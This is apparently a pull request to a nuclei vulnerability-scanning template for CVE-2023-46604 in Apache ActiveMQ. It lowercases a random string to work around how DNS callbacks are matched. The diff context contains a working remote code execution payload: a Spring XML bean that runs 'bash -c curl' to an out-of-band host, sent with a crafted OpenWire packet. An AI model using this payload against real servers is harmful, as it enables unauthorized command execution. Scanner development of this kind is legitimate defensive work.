### PR TITLE
Fixing CVE-2023-46604

### DIFF
--- a/javascript/cves/2023/CVE-2023-46604.yaml
+++ b/javascript/cves/2023/CVE-2023-46604.yaml
@@ -40,7 +40,7 @@ javascript:
       let b = m2.Buffer();
       let name=Host+':'+Port;
       let conn = m1.Open('tcp', name);
-      let randomvar = '{{randstr}}'
+      let randomvar = '{{randstr}}'.toLowerCase();
       var Base64={encode: btoa}
       exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
       packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"


### PR DESCRIPTION
### Template / PR Information
This PR "fixes" `CVE-2023-46604` by using a random lowercase prefix for the payload.

The PR https://github.com/projectdiscovery/nuclei/pull/4697 enforces lowercase conversion of interactsh DNS interactions  while the `randstr` placeholder  generates potentially mixed case sequences. In my opinion the change in nuclei core should be reverted as it violates [rfc4343](https://www.rfc-editor.org/rfc/rfc4343#page-2) and introduces potential issues as erroneous storing of dns raw payload data or comparison failures like in this template.

All templates using mixed case sequences in comparisons might be affected. 

### Template Validation

I've validated this template locally?
- [ ] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)